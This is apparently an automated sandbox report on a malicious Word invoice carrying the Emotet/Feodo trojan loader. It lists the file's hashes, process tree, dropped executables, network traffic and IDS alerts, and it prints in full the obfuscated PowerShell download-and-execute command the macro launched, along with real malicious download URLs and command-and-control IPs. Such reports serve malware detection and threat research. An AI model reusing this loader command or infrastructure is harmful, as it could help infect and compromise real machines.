File name:	Invoice_No_VWR_S762180.doc
Full analysis:	https://app.any.run/tasks/a497af25-4b08-453c-a2ac-16a4132bcac6
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	November 08, 2018, 07:36:39
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open generated-doc trojan loader emotet feodo maldoc-4
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Annabelle-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 7 16:48:00 2018, Last Saved Time/Date: Wed Nov 7 16:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:	A3D4A805F1E2065A130366FCB039CFE1
SHA1:	FE850E09B8E07389F0D2A4F8DED4D07A23457610
SHA256:	70FF27930C547C105468E884F62D01231CE7BB312AADED34D6942DEFD3507B9E
SSDEEP:	768:V7FLVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OkHiQDPjEed72k:VZLocn1kp59gxBK85fBt+a9vdS

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

CompObjUserType:	Microsoft Word 97-2003 Document
CompObjUserTypeLen:	32
HeadingPairs:	Title 1
TitleOfParts:	-
HyperlinksChanged:	No
SharedDoc:	No
LinksUpToDate:	No
ScaleCrop:	No
AppVersion:	16
CharCountWithSpaces:	14
Paragraphs:	1
Lines:	1
Company:	-
CodePage:	Windows Latin 1 (Western European)
Security:	None
Characters:	13
Words:	2
Pages:	1
ModifyDate:	2018:11:07 16:48:00
CreateDate:	2018:11:07 16:48:00
TotalEditTime:	-
Software:	Microsoft Office Word
RevisionNumber:	1
LastModifiedBy:	-
Template:	Normal.dotm
Comments:	-
Keywords:	-
Author:	Annabelle-PC
Subject:	-
Title:	-

PID	CMD	Path	Indicators	Parent process
3552	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice_No_VWR_S762180.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
4028	CMD cmD /c "Set vPn=(NeW-OBjeCT io.cOmPREsSIon.DEflaTeSTream( [sySTeM.iO.MEmoRystREaM] [sYSTeM.cOnvErt]::frOMbASE64sTRing( 'PZBBb8IwDIX/Sg+RAmIkO8DEiCohwZAKE5tY2TjskgaXZjRJlaaEDfHfl6Kxm/X8+dl+SKbbWIPvm+wLhItW4MgHZNNSgnYMbV/nMS6cq8aUeu8JV0EGW1lZA5E6N3Qtkwef/kwnf1TGC8mFBe7kkRNhFPWnQg2WgxtQS6743krRlK6xUFmzawRcSRXKEmo64i/vu+XoNiEKbsM9uTm1FMks9VORP6vVMGn+19aK1zXfAyka6rdPGzlQ6xSTt6qUroMnuMtQsplFcYSH94+YocXGxAj0cexAVT38iXttv4cJnACz3IQPRNFBs4WLpI7aILpnZ7/PKARGZsbr0vDdXJZwZe6i1rDLEn00B+gnwfSqsCz4HNhFcCeK8+XyCw=='),[sYStEM.io.cOMPRESSION.coMprESSionmoDE]::decompResS)^\|%{NeW-OBjeCT Io.sTREamReADEr($_, [sySteM.tExt.ENcodINg]::aScIi) } ^\| %{ $_.rEadTOENd( ) })^\|inVOKe-EXpreSSioN&&POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))"	C:\Windows\system32\CMD.exe	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
572	POWerSHell ${9`QP} = [tyPE]( \"{3}{2}{1}{0}\" -F'eNt','NM','viro','En') ; ${eXeCUTiONcontexT}.\"I`NVo`kEcOMmanD\".(\"{0}{2}{1}\" -f 'invOkESC','PT','Ri' ).Invoke( ( ${9`qp}::( \"{4}{1}{3}{2}{5}{0}\" -f'E','EtEN','Ar','VIroNMENTv','G','iaBL' ).Invoke( 'VPN',( \"{0}{1}{2}\"-f'pr','o','CESs' ) ) ))	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		CMD.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2932	"C:\Users\admin\AppData\Local\Temp\509.exe"	C:\Users\admin\AppData\Local\Temp\509.exe	—	powershell.exe
User: admin Company: Micro Integrity Level: MEDIUM Description: Microsof Exit code: 0 Version: 2
540	"C:\Users\admin\AppData\Local\Temp\509.exe"	C:\Users\admin\AppData\Local\Temp\509.exe		509.exe
User: admin Company: Micro Integrity Level: MEDIUM Description: Microsof Exit code: 0 Version: 2
3444	"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"	C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe	—	509.exe
User: admin Company: Micro Integrity Level: MEDIUM Description: Microsof Exit code: 0 Version: 2
4080	"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"	C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe		lpiograd.exe
User: admin Company: Micro Integrity Level: MEDIUM Description: Microsof Version: 2

PID	Process	Filename		Type
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR3488.tmp.cvr		—
		MD5:—	SHA256:—
572	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R6DRTWB58YAZXQTIAGUM.temp		—
		MD5:—	SHA256:—
572	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms		binary
		MD5:2E6C332796340AFFBFF5230455889D0D	SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
572	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183c97.TMP		binary
		MD5:2E6C332796340AFFBFF5230455889D0D	SHA256:6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E
3552	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:A4DC25B40AAEF92DCDE38C506EC93C7B	SHA256:E23A1AB7F6A3E45A91FB7675584C3AA1C13252B68A9E32AFCC33F21FA3324896
3552	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\~$voice_No_VWR_S762180.doc		pgc
		MD5:D28E4A5287241DE7060399CA3157DA67	SHA256:019C422A0590B1307353E59005311382B095FFB5802EE8DBBCE5F5C184117BCB
572	powershell.exe	C:\Users\admin\AppData\Local\Temp\509.exe		executable
		MD5:63287FA5A786B27EAD904CF0B51351A4	SHA256:64BB87460F4F11717891F4598F20BF4913F70A0AE2E71D71C69F37193A65AD6D
540	509.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe		executable
		MD5:63287FA5A786B27EAD904CF0B51351A4	SHA256:64BB87460F4F11717891F4598F20BF4913F70A0AE2E71D71C69F37193A65AD6D

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
4080	lpiograd.exe	GET	200	187.163.174.149:8080	http://187.163.174.149:8080/	MX	binary	714 Kb	malicious
572	powershell.exe	GET	301	132.148.249.54:80	http://www.amenterprise.info/RiI6wTzC	US	html	246 b	malicious
4080	lpiograd.exe	GET	200	187.163.174.149:8080	http://187.163.174.149:8080/	MX	binary	148 b	malicious
4080	lpiograd.exe	GET	200	47.157.181.81:443	http://47.157.181.81:443/	US	binary	52.0 Kb	malicious
4080	lpiograd.exe	GET	200	47.157.181.81:443	http://47.157.181.81:443/whoami.php	US	text	13 b	malicious
572	powershell.exe	GET	200	132.148.249.54:80	http://www.amenterprise.info/RiI6wTzC/	US	executable	132 Kb	malicious

Domain	IP	Reputation
www.amenterprise.info	132.148.249.54	malicious
imap.1und1.de	212.227.15.188 212.227.15.171	shared
pop.ingeambientedelcaribe.com.co	208.91.198.215 208.91.199.6 208.91.199.246 208.91.199.116	unknown
alfa3062.alfahosting-server.de	109.237.136.10	unknown
pop3.peuquejeans.com.ar	190.61.250.150	suspicious
imap.udag.de	62.146.106.12	shared
mail.axon.com.bo	144.76.195.177	unknown
mail.laboratoriosgm.com	138.201.222.205	unknown
mail.laveneciana.mx	75.126.150.202	unknown
webmail.sperryplastlimited.net	13.232.58.40	unknown

PID	Process	Class	Message
572	powershell.exe	A Network Trojan was detected	SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
572	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
572	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
572	powershell.exe	Misc activity	ET INFO EXE - Served Attached HTTP
4080	lpiograd.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo HTTP request
4080	lpiograd.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo HTTP request
4080	lpiograd.exe	Generic Protocol Command Decode	SURICATA Applayer Detect protocol only one direction
4080	lpiograd.exe	Generic Protocol Command Decode	SURICATA Applayer Detect protocol only one direction
4080	lpiograd.exe	Generic Protocol Command Decode	SURICATA Applayer Detect protocol only one direction
4080	lpiograd.exe	Generic Protocol Command Decode	SURICATA Applayer Detect protocol only one direction

PID	Process	IP	Domain	ASN	CN	Reputation
4080	lpiograd.exe	47.157.181.81:443	—	Frontier Communications of America, Inc.	US	malicious
572	powershell.exe	132.148.249.54:80	www.amenterprise.info	GoDaddy.com, LLC	US	suspicious
4080	lpiograd.exe	62.146.106.12:465	imap.udag.de	QSC AG	DE	unknown
4080	lpiograd.exe	45.35.56.178:465	mail.pratsa.com.mx	Psychz Networks	US	suspicious
4080	lpiograd.exe	75.126.150.202:465	mail.laveneciana.mx	SoftLayer Technologies Inc.	US	unknown
4080	lpiograd.exe	67.225.212.6:465	mail.agrosilos.com.mx	Liquid Web, L.L.C	US	malicious
4080	lpiograd.exe	138.201.222.205:587	mail.laboratoriosgm.com	Hetzner Online GmbH	DE	unknown
4080	lpiograd.exe	109.237.136.10:587	alfa3062.alfahosting-server.de	Envia Tel GmbH	DE	unknown
4080	lpiograd.exe	52.97.131.178:25	pop-mail.outlook.com	Microsoft Corporation	US	whitelisted
4080	lpiograd.exe	187.163.174.149:8080	—	Axtel, S.A.B. de C.V.	MX	malicious

General Info

Invoice_No_VWR_S762180.doc

A3D4A805F1E2065A130366FCB039CFE1

FE850E09B8E07389F0D2A4F8DED4D07A23457610

70FF27930C547C105468E884F62D01231CE7BB312AADED34D6942DEFD3507B9E

768:V7FLVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9OkHiQDPjEed72k:VZLocn1kp59gxBK85fBt+a9vdS

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Application was dropped or rewritten from another process

Changes the autorun value in the registry

Starts CMD.EXE for commands execution

Downloads executable files from the Internet

FEODO was detected

EMOTET was detected

Unusual execution from Microsoft Office

Connects to CnC server

SUSPICIOUS

Executable content was dropped or overwritten

Creates files in the user directory

Starts itself from another location

Executes PowerShell scripts

Connects to SMTP port

Connects to unusual port

INFO

Reads Microsoft Office registry keys

Creates files in the user directory

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings